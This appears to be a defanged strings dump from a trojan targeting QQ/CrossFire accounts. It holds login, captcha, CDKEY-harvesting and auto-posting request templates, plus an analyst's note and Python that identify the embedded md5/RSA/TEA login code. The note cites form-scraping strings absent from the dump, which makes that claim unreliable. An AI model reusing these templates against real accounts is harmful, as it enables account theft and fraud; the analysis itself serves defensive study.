hXXp://VVV.51.la/report/1_main.asp?id=18855916
hXXp://VVV.51.la/report/1_main_online.asp?id=18855916
hXXp://count.knowsky.com/count2/count.asp?id=85436&sx=1&ys=43
hXXp://count.knowsky.com/img/(.*?)/(.*?).gif
hXXp://apps.game.qq.com/comm-cgi-bin/content_admin/activity_center/query_role.cgi?game=cf&area=
hXXp://apps.game.qq.com/cf/a20141126main/getUserInfo.php?action=initQuery&sArea=
tEXtXML:com.adobe.xmp
<rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#">
xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/"
xmlns:photoshop="hXXp://ns.adobe.com/photoshop/1.0/"
xmlns:dc="hXXp://purl.org/dc/elements/1.1/"
xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/"
xmlns:stEvt="hXXp://ns.adobe.com/xap/1.0/sType/ResourceEvent#"
xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#"
xmlns:tiff="hXXp://ns.adobe.com/tiff/1.0/"
xmlns:exif="hXXp://ns.adobe.com/exif/1.0/">
<xmp:CreatorTool>Adobe Photoshop CC (Windows)</xmp:CreatorTool>
/* |xGv00|13a28bd5e87728de7241d2f04c3c02f5 */hXXp://apps.game.qq.com/cgi-bin/cf/cfvip/checkCFvipStatue.cgi?rd=0.3552593735512346&_=1459778886737
msg":"
hXXp://apps.game.qq.com/cf/cfvip/doCfVip.php?action=getCfVipInfo&rd=0.16843547895445687&_=1459479795992
hXXp://apps.game.qq.com/php/tgclub/v2/user/logininfo?callback=jQuery17209628733010031283_1459773913284&_=1459773913464
ÿF8>NFFFh
ÿFV
,.Ey)
qTcp,
hXXp://wpa.qq.com/msgrd?v=3&uin=138417120&site=qq&menu=yes
&appid=15000103&js_ver=10153&js_type=1&login_sig=0nLadn6F*IOLoKBk7n-g3iCxqdCGPSIeyZhV-iaDTmCcf6BeP3DeVa3TGrAvmDod&u1=http://act.qzone.qq.com/meteor/pc/index.html?rid=998=1000&e_code=224288?ADTAG=bangbang.hdsq&r=0.15214470936916769
hXXp://check.ptlogin2.qq.com/check?regmaster=&pt_tea=1&pt_vcode=1&uin=
&pt_randsalt=0&ptredirect=1&u1=http://act.qzone.qq.com/meteor/pc/index.html?rid=998=1000&e_code=224288?ADTAG=bangbang.hdsq&h=1&t=1&g=1&from_ui=1&ptlang=2052&action=2-6-1461659794871&js_ver=10153&js_type=1&login_sig=0nLadn6F*IOLoKBk7n-g3iCxqdCGPSIeyZhV-iaDTmCcf6BeP3DeVa3TGrAvmDod&pt_uistyle=20&aid=15000103&daid=5&
hXXp://ptlogin2.qq.com/login?u=
&s_url=http://act.qzone.qq.com/meteor/pc/index.html?rid=998=1000&e_code=224288?ADTAG=bangbang.hdsq&f_url=&ptlang=2052&ptredirect=100&aid=1000101&daid=5&j_later=0&low_login_hour=0&regmaster=0&pt_login_type=2&pt_aid=15000103&pt_aaid=0&pt_light=0&pt_3rd_aid=0
hXXp://ptlogin4.qzone.qq.com/check_sig?pttype=2&uin=
return binl2hex(core_md5(str2binl(s), s.length * chrsz))
return binl2str(core_md5(str2binl(s), s.length * chrsz))
function hex_hmac_md5(key, data) {
return binl2hex(core_hmac_md5(key, data))
function b64_hmac_md5(key, data) {
return binl2b64(core_hmac_md5(key, data))
function str_hmac_md5(key, data) {
return binl2str(core_hmac_md5(key, data))
for (var i = 0; i < x.length; i += 16) {
function core_hmac_md5(key, data) {
var bkey = str2binl(key);
if (bkey.length > 16) {
bkey = core_md5(bkey, key.length * chrsz)
ipad[i] = bkey[i] ^ 909522486;
opad[i] = bkey[i] ^ 1549556828
var hash = core_md5(ipad.concat(str2binl(data)), 512 + data.length * chrsz);
return core_md5(opad.concat(hash), 512 + 128)
for (var i = 0; i < str.length * chrsz; i += chrsz) {
bin[i >> 5] |= (str.charCodeAt(i / chrsz) & mask) << (i % 32)
for (var i = 0; i < bin.length * 32; i += chrsz) {
str += String.fromCharCode((bin[i >> 5] >>> (i % 32)) & mask)
for (var i = 0; i < binarray.length * 4; i++) {
str += hex_tab.charAt((binarray[i >> 2] >> ((i % 4) * 8 + 4)) & 15) + hex_tab.charAt((binarray[i >> 2] >> ((i % 4) * 8)) & 15)
for (var i = 0; i < binarray.length * 4; i += 3) {
if (i * 8 + j * 6 > binarray.length * 32) {
str += tab.charAt((triplet >> 6 * (3 - j)) & 63)
for (var i = 0; i < str.length; i = i + 2) {
arr.push('\\x' + str.substr(i, 2))
arr = arr.join('');
function getEncryption(password, salt, vcode, isMd5) {
password = password || '';
var md5Pwd = isMd5 ? password: md5(password),
rsaH1 = $.RSA.rsa_encrypt(h1),
rsaH1Len = (rsaH1.length / 2).toString(16),
hexVcode = TEA.strToBytes(vcode.toUpperCase()),
vcodeLen = '000' + vcode.length.toString(16);
while (rsaH1Len.length < 4) {
TEA.initkey(s2);
var saltPwd = TEA.enAsBase64(rsaH1Len + rsaH1 + TEA.strToBytes(salt) + vcodeLen + hexVcode);
TEA.initkey('');
return saltPwd.replace(/[\/\+=]/g,
'/': '-',
'+': '*',
'=': '_'
function getRSAEncryption(password, vcode, isMd5) {
var str1 = isMd5 ? password: md5(password);
var str2 = str1 + vcode.toUpperCase();
var str3 = $.RSA.rsa_encrypt(str2);
$.RSA = function() {
while (z + aD < aC.length) {
t += aC.substring(z, z + aD) + '\n';
return t + aC.substring(z, aC.length)
return '0' + t.toString(16)
return t.toString(16)
if (aG < aD.length + 11) {
var aC = aD.length - 1;
var aE = aD.charCodeAt(aC--);
z.nextBytes(t)
this.dmp1 = null;
this.dmq1 = null;
this.coeff = null
if (z != null && t != null && z.length > 0 && t.length > 0) {
uv_alert('Invalid RSA public key')
return t.modPowInt(this.e, this.n)
var t = ah(aC, (this.n.bitLength() + 7) >> 3);
var aD = this.doPublic(t);
var z = aD.toString(16);
if ((z.length & 1) == 0) {
N.prototype.doPublic = Y;
N.prototype.setPublic = q;
N.prototype.encrypt = r;
this.fromNumber(z, t, aC)
this.fromString(z, 256)
this.fromString(z, t)
aG = Math.floor(aC / 67108864);
if (ab && (navigator.appName == 'Microsoft Internet Explorer')) {
au.prototype.am = aA;
if (ab && (navigator.appName != 'Netscape')) {
au.prototype.am = b;
au.prototype.am = az;
au.prototype.DB = ay;
au.prototype.DM = ((1 << ay) - 1);
au.prototype.DV = (1 << ay);
au.prototype.FV = Math.pow(2, ac);
au.prototype.F1 = ac - ay;
au.prototype.F2 = 2 * ay - ac;
ar = '0'.charCodeAt(0);
ar = 'a'.charCodeAt(0);
ar = 'A'.charCodeAt(0);
return ag.charAt(t)
var aC = ai[z.charCodeAt(t)];
z.fromInt(t);
this.fromRadix(aG, z);
var aF = aG.length,
if (aG.charAt(aF) == '-') {
if (aE + aD > this.DB) {
this[this.t - 1] |= (t & ((1 << (this.DB - aE)) - 1)) << aE;
this[this.t++] = (t >> (this.DB - aE))
if (aE >= this.DB) {
aE -= this.DB
this[this.t - 1] |= ((1 << (this.DB - aE)) - 1) << aE
this.clamp();
au.ZERO.subTo(this, this)
var t = this.s & this.DM;
return '-' + this.negate().toString(z)
return this.toRadix(z)
var aG = this.DB - (aD * this.DB) % aC;
if (aG < this.DB && (aH = this[aD] >> aG) > 0) {
aH |= this[--aD] >> (aG += this.DB - aC)
aG += this.DB; --aD
au.ZERO.subTo(this, t);
return (this.s < 0) ? this.negate() : this
return this.DB * (this.t - 1) + l(this[this.t - 1] ^ (this.s & this.DM))
z.t = Math.max(this.t - aC, 0);
var z = aH % this.DB;
var t = this.DB - z;
var aE = Math.floor(aH / this.DB),
aG = (this.s << z) & this.DM,
aD.clamp()
var aE = Math.floor(aG / this.DB);
var z = aG % this.DB;
t = Math.min(z.t, this.t);
aD[aC++] = aE & this.DM;
aE >>= this.DB
aD[aC++] = aE & this.DM;
aE >>= this.DB
aD[aC++] = this.DV + aE
var t = this.abs(),
aE = z.abs();
aD[aC + t.t] = t.am(0, aE[aC], aD, aC, 0, t.t)
aD.clamp();
au.ZERO.subTo(aD, aD)
var t = this.abs();
var aD = t.am(z, t[z], aC, 2 * z, 0, 1);
if ((aC[z + t.t] += t.am(z + 1, 2 * t[z], aC, 2 * z + 1, aD, t.t - z - 1)) >= t.DV) {
aC[z + t.t] -= t.DV;
aC[aC.t - 1] += t.am(z, t[z], aC, 2 * z, 0, 1)
aC.clamp()
var aQ = aK.abs();
var aI = this.abs();
aH.fromInt(0)
this.copyTo(aG)
var aP = this.DB - l(aQ[aQ.t - 1]);
aQ.lShiftTo(aP, aE);
aI.lShiftTo(aP, aG)
aQ.copyTo(aE);
aI.copyTo(aG)
var aT = this.FV / aL,
aE.dlShiftTo(aN, aF);
if (aG.compareTo(aF) >= 0) {
aG.subTo(aF, aG)
au.ONE.dlShiftTo(aM, aF);
aF.subTo(aE, aE);
var aD = (aG[--aO] == aC) ? this.DM: Math.floor(aG[aO] * aT + (aG[aO - 1] + aR) * aS);
if ((aG[aO] += aE.am(0, aD, aG, aN, 0, aM)) < aD) {
aE.dlShiftTo(aN, aF);
aG.subTo(aF, aG);
aG.subTo(aF, aG)
aG.drShiftTo(aM, aH);
au.ZERO.subTo(aH, aH)
aG.clamp();
aG.rShiftTo(aP, aG)
au.ZERO.subTo(aG, aG)
this.abs().divRemTo(t, null, z);
if (this.s < 0 && z.compareTo(au.ZERO) > 0) {
t.subTo(z, z)
if (t.s < 0 || t.compareTo(this.m) >= 0) {
return t.mod(this.m)
t.divRemTo(this.m, null, t)
t.multiplyTo(aC, z);
this.reduce(z)
t.squareTo(z);
M.prototype.convert = X;
M.prototype.revert = am;
M.prototype.reduce = L;
M.prototype.mulTo = J;
M.prototype.sqrTo = aw;
z = (z * (2 - t * z % this.DV)) % this.DV;
return (z > 0) ? this.DV - z: -z
this.mp = t.invDigit();
this.mpl = this.mp & 32767;
this.mph = this.mp >> 15;
this.um = (1 << (t.DB - 15)) - 1;
this.mt2 = 2 * t.t
t.abs().dlShiftTo(this.m.t, z);
z.divRemTo(this.m, null, z);
if (t.s < 0 && z.compareTo(au.ZERO) > 0) {
this.m.subTo(z, z)
t.copyTo(z);
this.reduce(z);
while (t.t <= this.mt2) {
var aD = (z * this.mpl + (((z * this.mph + (t[aC] >> 15) * this.mpl) & this.um) << 15)) & t.DM;
t[z] += this.m.am(0, aD, t, aC, 0, this.m.t);
while (t[z] >= t.DV) {
t[z] -= t.DV;
t.clamp();
t.drShiftTo(this.m.t, t);
if (t.compareTo(this.m) >= 0) {
t.subTo(this.m, t)
g.prototype.convert = al;
g.prototype.revert = av;
g.prototype.reduce = R;
g.prototype.mulTo = B;
g.prototype.sqrTo = ao;
return au.ONE
aF = aI.convert(this),
aF.copyTo(aG);
aI.sqrTo(aG, aC);
aI.mulTo(aC, aF, aG)
return aI.revert(aG)
if (aC < 256 || t.isEven()) {
return this.exp(aC, aD)
au.prototype.copyTo = aa;
au.prototype.fromInt = p;
au.prototype.fromString = y;
au.prototype.clamp = Q;
au.prototype.dlShiftTo = at;
au.prototype.drShiftTo = Z;
au.prototype.lShiftTo = v;
au.prototype.rShiftTo = n;
au.prototype.subTo = ad;
au.prototype.multiplyTo = F;
au.prototype.squareTo = S;
au.prototype.divRemTo = G;
au.prototype.invDigit = D;
au.prototype.isEven = k;
au.prototype.exp = A;
au.prototype.toString = s;
au.prototype.negate = T;
au.prototype.abs = an;
au.prototype.compareTo = I;
au.prototype.bitLength = w;
au.prototype.mod = P;
au.prototype.modPowInt = ap;
au.ZERO = c(0);
au.ONE = c(1);
d(new Date().getTime())
if (navigator.appName == 'Netscape' && navigator.appVersion < '5' && window.crypto && window.crypto.random) {
var H = window.crypto.random(32);
for (K = 0; K < H.length; ++K) {
W[ae++] = H.charCodeAt(K) & 255
K = Math.floor(65536 * Math.random());
o.init(W);
for (ae = 0; ae < W.length; ++ae) {
return o.next()
for (t = 0; t < z.length; ++t) {
af.prototype.nextBytes = ax;
z = (z + this.S[aD] + aE[aD % aE.length]) & 255;
m.prototype.init = f;
m.prototype.next = a;
t.setPublic(aC, z);
return t.encrypt(aD)
return Math.round(Math.random() * 4294967295)
for (var B = 0; B < D.length; B++) {
var C = Number(D[B]).toString(16);
if (C.length == 1) {
for (var A = 0; A < B.length; A += 2) {
C += String.fromCharCode(parseInt(B.substr(A, 2), 16))
for (var A = 0; A < C.length; A++) {
B[A] = C.charCodeAt(A)
var A = C.length;
var A = E.length;
for (var C = 0; C < B.length; C++) {
var A = u.length;
for (var B = 0; B < E.length; B++) {
C[B] = E.charCodeAt(B) & 255
for (var B = 0; B < E.length; B += 2) {
C[A++] = parseInt(E.substr(B, 2), 16)
s.TEA = {
for (var B = 0; B < C.length; B++) {
A += String.fromCharCode(C[B])
return d.encode(A)
initkey: function(A, B) {
d.PADCHAR = '=';
d.ALPHA = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/';
d.getbyte = function(C, B) {
var A = C.charCodeAt(B);
d.encode = function(E) {
if (arguments.length != 1) {
var B = d.PADCHAR;
var G = d.ALPHA;
var F = d.getbyte;
var C = E.length - E.length % 3;
if (E.length == 0) {
A.push(G.charAt(H >> 18));
A.push(G.charAt((H >> 12) & 63));
A.push(G.charAt((H >> 6) & 63));
A.push(G.charAt(H & 63))
switch (E.length - C) {
A.push(G.charAt(H >> 18) + G.charAt((H >> 12) & 63) + B + B);
A.push(G.charAt(H >> 18) + G.charAt((H >> 12) & 63) + G.charAt((H >> 6) & 63) + B);
return A.join('')
if (!window.btoa) {
window.btoa = d.encode
var hex = str.toString(16);
var len = hex.length;
arr.push('\\x' + hex.substr(j, 2))
var result = arr.join('');
hexVcode = s.TEA.strToBytes(c.toUpperCase()),
vcodeLen = '000' + c.length.toString(16);
s.TEA.initkey(s2);
var saltPwd = s.TEA.enAsBase64(rsaH1Len + rsaH1 + s.TEA.strToBytes(salt) + vcodeLen + hexVcode);
s.TEA.initkey('');
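The JavaScript fragments above are not the trojan's own cryptography: the function and property names (core_hmac_md5, binl2hex, str2binl; modPowInt, invDigit, dlShiftTo, am/DB/DM/DV) match Paul Johnston's md5.js and Tom Wu's jsbn, and getEncryption/getRSAEncryption with the TEA step is the client-side password encoding of the QQ web login page, carried inside the binary so the sample can drive that login flow itself. Two details worth confirming from the dump: the decimal XOR constants 909522486 and 1549556828 are 0x36363636 and 0x5C5C5C5C, the ordinary HMAC ipad/opad words, and the final replace() swaps the base64 characters '/', '+', '=' for '-', '*', '_'. The Python below is an added example, not code from the report or from the sample: it rebuilds HMAC-MD5 with the same pad construction and cross-checks it against the standard library, and it applies and undoes the character substitution so strings in that alphabet can be decoded. The login_sig value is copied verbatim from the strings on this page; the HMAC inputs are constructed test data.

```python
import base64
import hashlib
import hmac

# XOR constants exactly as they appear (in decimal) in the dumped core_hmac_md5.
IPAD_WORD = 909522486    # 0x36363636: RFC 2104 ipad byte 0x36, four per 32-bit word
OPAD_WORD = 1549556828   # 0x5C5C5C5C: RFC 2104 opad byte 0x5C, four per 32-bit word


def pad_constants_are_standard_hmac() -> bool:
    """True if the dumped constants are the ordinary HMAC pads, not custom crypto."""
    return IPAD_WORD == 0x36363636 and OPAD_WORD == 0x5C5C5C5C


def hmac_md5_like_dump(key: bytes, data: bytes) -> str:
    """Byte-level equivalent of the dumped core_hmac_md5: a key longer than one
    MD5 block (16 words = 64 bytes) is hashed first, the key is zero-padded to
    the block, XORed with ipad/opad, then MD5(opad || MD5(ipad || data))."""
    if len(key) > 64:
        key = hashlib.md5(key).digest()
    key = key.ljust(64, b"\x00")
    ipad = bytes(b ^ 0x36 for b in key)
    opad = bytes(b ^ 0x5C for b in key)
    inner = hashlib.md5(ipad + data).digest()
    return hashlib.md5(opad + inner).hexdigest()


def matches_stdlib_hmac(key: bytes, data: bytes) -> bool:
    """Cross-check the hand-rolled construction against Python's hmac module."""
    return hmac_md5_like_dump(key, data) == hmac.new(key, data, hashlib.md5).hexdigest()


# getEncryption() in the dump ends with saltPwd.replace(/[\/\+=]/g, ...) mapping
# '/' -> '-', '+' -> '*', '=' -> '_'.  These two tables apply and undo that mapping.
_TO_QQ = str.maketrans({"/": "-", "+": "*", "=": "_"})
_FROM_QQ = str.maketrans({"-": "/", "*": "+", "_": "="})


def qq_b64encode(raw: bytes) -> str:
    """Standard base64 followed by the dump's character substitution."""
    return base64.b64encode(raw).decode("ascii").translate(_TO_QQ)


def qq_b64decode(text: str) -> bytes:
    """Undo the substitution, then decode as ordinary base64."""
    return base64.b64decode(text.translate(_FROM_QQ))


# A login_sig value copied verbatim from the strings on this page; it is written
# in the same substituted alphabet ('-' and '*' where base64 would have '/' and '+').
LOGIN_SIG_FROM_PAGE = "kfVLgNRMRQUC6C0PRRA2ooX-A9w5NXfpsDsDwLOf48L779v*igTIF1BbikF4AjaV"


def login_sig_byte_length() -> int:
    """Decoded size of the page's login_sig: 64 base64 characters give 48 bytes."""
    return len(qq_b64decode(LOGIN_SIG_FROM_PAGE))


if __name__ == "__main__":
    print(pad_constants_are_standard_hmac())
    print(hmac_md5_like_dump(b"key", b"The quick brown fox jumps over the lazy dog"))
    print(qq_b64encode(b"\xff\xfe\xfd\x00"), login_sig_byte_length())
```

Recognising the library code this way is what lets an analyst skip it: the RSA public key and TEA key that getEncryption needs are not among the dumped strings, so the interesting material is not the crypto but the request templates and the form-field scraping strings (type=password, onkeyup, mail.qq.com) further down.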
&appid=21000124&js_ver=10181&js_type=1&login_sig=kfVLgNRMRQUC6C0PRRA2ooX-A9w5NXfpsDsDwLOf48L779v*igTIF1BbikF4AjaV&u1=http://cf.qq.com/clan/&r=
hXXps://ssl.ptlogin2.qq.com/check?regmaster=&pt_tea=2&pt_vcode=1&uin=
function time(){return Math.random()}
hXXps://ssl.captcha.qq.com/cap_union_getsig_new?aid=21000124&captype=&protocol=https&clientype=2&disturblevel=&apptype=2&noBorder=noborder&showtype=embed&uin=
hXXps://ssl.captcha.qq.com/getimgbysig?aid=21000124&captype=&protocol=https&clientype=2&disturblevel=&apptype=2&noBorder=noborder&showtype=embed&uin=
&pt_randsalt=0&u1=http://cf.qq.com/cp/a20160217cfyj/index.htm?e_code=213271&h=1&t=1&g=1&from_ui=1&ptlang=2052&action=2-4-1457704626950&js_ver=10151&js_type=1&login_sig=&pt_uistyle=32&aid=21000124&daid=8&
pt_mbkey
[SKEY]
"cdkey":"(.*?)"
[%d/d/d d:d]
\CF_CDKEY.ini
hXXp://act.tgp.qq.com/index.php/
Host: act.tgp.qq.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Referer: hXXp://act.tgp.qq.com/cf/cf20160325/index.html?ADTAG=bangbang.hdsq
%7C
&user_checkparam=cf%7Cyes%7C
"msg":"
sMsg":"
sMsg":"MODULE OK"
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=tgclub&iActivityId=
hXXp://bang.qq.com/actcenter/queryFilterActList
"url":"(.*?)"
hXXp://kf.qq.com/cgi-bin/common?rand=0.7021259550817557&command=command=C00006&fromtype=kfweb&fromtoolid=kfweb514&type=getCFSpend&area=
Referer:hXXp://kf.qq.com/game/consume_records.html?code=cf
hXXp://apps.game.qq.com/cgi-bin/cf/userinfo/userinfo.cgi?ssn=
hXXp://VVV.baidu.com/
hXXp://bbs.cf.qq.com/home.php?mod=task&do=apply&id=5
hXXp://bbs.cf.qq.com/home.php?mod=spacecp&ac=credit&showcredit=1
hXXp://bbs.cf.qq.com/forum.php?mod=forumdisplay&fid=30503&page=6
&extra=&replysubmit=yes&infloat=yes&handlekey=fastpost&inajax=1
hXXp://bbs.cf.qq.com/forum.php?mod=post&action=reply&fid=30503&tid=


&posttime=
hXXp://bbs.cf.qq.com/home.php?mod=task&do=draw&id=5
hXXp://bbs.cf.qq.com/forum.php
&searchkey=15051408311873756101000000000000&from=1&question=免费枪&vip=0&bangdou=1
%7C322%7C
*&checkparam=cf%7Cyes%7C
&ams_checkparam=cf%7Cyes%7C
&e_code=0&g_code=0&eas_url=http%3A%2F%2Fbang.qq.com%2Fshop%2Findex%2Fcf%2F&eas_refer=&sServiceDepartment=xinyue&sServiceType=cf&sArea=
Referer:hXXp://bang.qq.com/comm-htdocs/js/ams/v0.2R02/ajaxcdr.swf
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=38135&sServiceDepartment=xinyue&set_info=xinyue
hXXp://bangbang.qq.com/php/robott3nologin/servey
Referer:hXXp://bang.qq.com/actcenter/index/cf
hXXp://bang.qq.com/ugc1/getActRecommend
game=cf&mid=0&eid=5&surl=http://bangbang.qq.com/php/login?game=cf&durl=http://bang.qq.com/actcenter/index/cf?&ref=ingame01&ref=ingame01
hXXp://bang.qq.com/user/scorePersonalAcenter
Referer: hXXp://bang.qq.com/main/tradeinfo/
game=bangbang&mid=9&eid=9000&surl=http://bang.qq.com/main/tradeinfo/&durl=http://bang.qq.com/main/tradeinfo/&world=0&serviceType=2&ref=
hXXp://bang.qq.com/user/scorePersonal
hXXp://bang.qq.com/comm-htdocs/js/ams/v0.2R02/ajaxcdr.swf
hXXp://cf.ams.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=38135&sServiceDepartment=group_f
&e_code=0&g_code=0&eas_url=http%3A%2F%2Fdaoju.qq.com%2Fmall%2Fjudou2.0%2Fcf.shtml&eas_refer=&sServiceDepartment=djc&sServiceType=dj
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=dj&iActivityId=11117&sServiceDepartment=djc&set_info=djc
&e_code=0&g_code=0&eas_url=http%3A%2F%2Fdaoju.qq.com%2Fmall%2Fjudou2.0%2Fcf.shtml&eas_refer=&sServiceDepartment=djc
gameId=&sArea=&iSex=&sRoleId=&iGender=&sServiceType=dj&objCustomMsg=&areaname=&roleid=&rolelevel=&rolename=&areaid=&iActivityId=11117&iFlowId=96910&g_tk=
Referer:hXXp://daoju.qq.com/comm-htdocs/js/milo/ajaxcdr.swf?0.9721381550078127
hXXp://djcapp.game.qq.com/daoju/v3/api/app/e_app/add_jf_firstlogin.php?appSource=ios&appVersion=35&sDeviceID=&p_tk=
&e_code=0&g_code=0&eas_url=http%3A%2F%2Fdaoju.qq.com%2Fmall%2Ftask.shtml&eas_refer=&sServiceDepartment=djc
gameId=&sArea=&iSex=&sRoleId=&iGender=&sServiceType=dj&objCustomMsg=&areaname=&roleid=&rolelevel=&rolename=&areaid=&iActivityId=35644&iFlowId=204638&g_tk=
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=dj&iActivityId=35644&sServiceDepartment=djc&set_info=djc
hXXp://iyouxi.vip.qq.com/ams3.0.php?_c=page&actid=23314&callback=vipSignNew.signCb&g_tk=
hXXp://iyouxi.vip.qq.com/ams3.0.php?actid=52002&g_tk=
hXXp://iyouxi.vip.qq.com/ams3.0.php?_c=page&actid=22249&g_tk=
hXXp://iyouxi.vip.qq.com/ams3.0.php?actid=23074&g_tk_type=1&g_tk=
hXXp://iyouxi.vip.qq.com/ams3.0.php?_c=page&actid=54963&callback=vipSignNew.signCb&g_tk=
&e_code=0&g_code=0&eas_url=http%3A%2F%2Fxinyue.qq.com%2Fweb201410%2Fwebgame.shtml&eas_refer=http%3A%2F%2Fxinyue.qq.com%2Fweb201410%2Fwebgame.shtml&sServiceDepartment=xinyue&sServiceType=tgclub
Referer: hXXp://xinyue.qq.com/comm-htdocs/js/milo/ajaxcdr.swf?0.7271989360451698
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=tgclub&iActivityId=21547&sServiceDepartment=xinyue&set_info=xinyue
hXXp://starvip.qq.com/fcg-bin/v2/fcg_mobile_starvip_site_checkin?g_tk=
&_=1454839692917
hXXp://x.pet.qq.com/vip_platform?cmd=set_sign_info&timer=1454839703753&callback=jQuery110205429354978259653_1454839692914&token=
msg": "
&pvsrc=102&s_p=0|http|&s_v=6.1.0.496&ozid=511022&vipid=&actid=68391&sid=&callback=json14530355412865&cache=3654
hXXp://iyouxi.vip.qq.com/ams3.0.php?g_tk=
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/600.1.3 (KHTML, like Gecko) Version/8.0 Mobile/12A4345d Safari/600.1.4
hXXp://proxy.vac.qq.com/cgi-bin/srfentry.fcgi?ts=1456988761581&g_tk=
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 9_2_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13D15 QQ/6.2.2.402 Pixel/640 NetType/WIFI Mem/86
&_=1452520903377
hXXp://pay.video.qq.com/fcgi-bin/sign?callback=jQuery111006800204519842937_1452520903238&low_login=1&uin=
hXXp://buluo.qq.com/cgi-bin/bar/card/bar_list_by_page
hXXp://buluo.qq.com/cgi-bin/bar/user/sign
hXXp://qun.qzone.qq.com/cgi-bin/get_group_list?callbackFun=woaiwang&uin=
Referer: hXXp://qiandao.qun.qq.com/cgi-bin/sign
Host: qiandao.qun.qq.com
hXXp://qiandao.qun.qq.com/cgi-bin/sign
hXXp://qiandao.qun.qq.com/cgi-bin/new_flag
hXXp://c.pc.qq.com/fcgi-bin/signin?callback=jsonp1453084008086&_=1453084046097&mood_id=238&checkin_date=&remark=一支穿云箭 千军万马来相见。
08 08 08 50
hXXp://cfzhushou.com/cfzs/help.html
hXXp://cfzhushou.com/help.html
hXXp://ip.qq.com/cgi-bin/myip
hXXps://aq.qq.com/cn2/safe_service/device_lock
aid=21000124&captype=&protocol=https&clientype=2&disturblevel=&apptype=2&noBorder=noborder&showtype=embed&uin=
hXXps://ssl.captcha.qq.com/cap_union_verify_new?random=1480258509499
&pt_randsalt=0&u1=http://cf.qq.com&h=1&t=1&g=1&from_ui=1&ptlang=2052&action=2-4-1457704626950&js_ver=10151&js_type=1&login_sig=&pt_uistyle=32&aid=21000124&daid=8&
hXXp://ossweb-img.qq.com/images/clientpop/act/cf/GpmHelpAct.js
http2://ossweb
hXXp://ossweb
"img":"http2(.*?).jpg"
"hXXp://(.*?)":{
"~ /1~!<
fD.nn'1r?
.KM8'
$&%cw]
hXXp://leesin.zuhaowan.com-
hXXp://leesin.zuhaowan.cn
hXXp://captcha.qq.com/getimage?aid=210001040.5721703316085041
hXXp://cf.ams.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=41615&sServiceDepartment=group_f
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=qqgame&iActivityId=41615&sServiceDepartment=group_h&set_info=group_h
hXXp://webd.tgp.qq.com/cf/info_proxy/weapon_stat_info?&&zone_id=
1970.01.01 08:00:00
function timea(){var d,s;d=new Date();d.setTime('
hXXp://cf.ams.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=55856&sServiceDepartment=group_f
hXXp://apps.game.qq.com/cf/a20160726hxb/getUserTask.php?action=getMyTaskList&iArea=
Referer:hXXp://cf.qq.com/act/a20160726hxb/index.htm
hXXp://apps.game.qq.com/daoju/appmarket/daoju_promotion/cloud_ticket/QueryCloudTicket.php?acctid=A100078&id=28&time=0.23177661886438727&_=1461381268102
"sMsg":"MODULE OK"
&e_code=0&g_code=0&eas_url=http%3A%2F%2Fbang.qq.com%2Fshop%2Findex%2Fcf%2F&eas_refer=http%3A%2F%2Fbang.qq.com%2Fmain%2Ftradeinfo%2F&sServiceDepartment=xinyue
gameId=&sArea=&iSex=&sRoleId=&iGender=&sServiceType=tgclub&objCustomMsg=&areaname=&roleid=&rolelevel=&rolename=&areaid=&iActivityId=38135&iFlowId=
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=tgclub&iActivityId=38135&sServiceDepartment=xinyue&set_info=xinyue
gameId=&sArea=&iSex=&sRoleId=&iGender=&sServiceType=tgclub&objCustomMsg=&areaname=&roleid=&rolelevel=&rolename=&areaid=&iActivityId=38135&iFlowId=214216&g_tk=
|322|
*&checkparam=cf|yes|
&ams_checkparam=cf|yes|
sCdKey=
hXXp://cf.ams.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=8918&sServiceDepartment=x1m1
sMsg" : "
\gzip.dll
`.data
gzip.pdb
_u%SV
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E)
hXXp://apps.game.qq.com/cgi-bin/cf/a20090409forceout/getinfo.cgi
hXXp://cfzhushou.com/pay.html
hXXps://ssl.ptlogin2.qq.com/ptqrshow?appid=21000124&e=2&l=M&s=4&d=72&v=4&t=0.061519597441372864&daid=8
&js_ver=10151&js_type=1&login_sig=7qKho-IT4nBHQJBVoTYw6p-IGP0hieZLRsmCy5MWU7g0bRJNRkb5q8yH7BUA7cTM&pt_uistyle=20&aid=21000124&daid=8&
hXXps://ssl.ptlogin2.qq.com/ptqrlogin?ptredirect=1&u1=http://cf.qq.com/cp/a20160223czxlx/index.htm?e_code=213709&h=1&t=1&g=1&from_ui=1&ptlang=2052&action=6-0-
game.qq.com
hXXps://xui.ptlogin2.qq.com/cgi-bin/xlogin?appid=21000124&s_url=hXXp://apps.game.qq.com&style=34
hXXp://cf.qq.com/cfvip/
hXXp://xinyue.qq.com
o%%co
``PBi %c
<\-M}*0_
;ptlogin2
apps.game.qq.com
hXXp://login.game.qq.com/comm-cgi-bin/login/LoginReturnInfo.cgi?callback=jsonp21&game=cf
nickName":"
?kernel32.dll
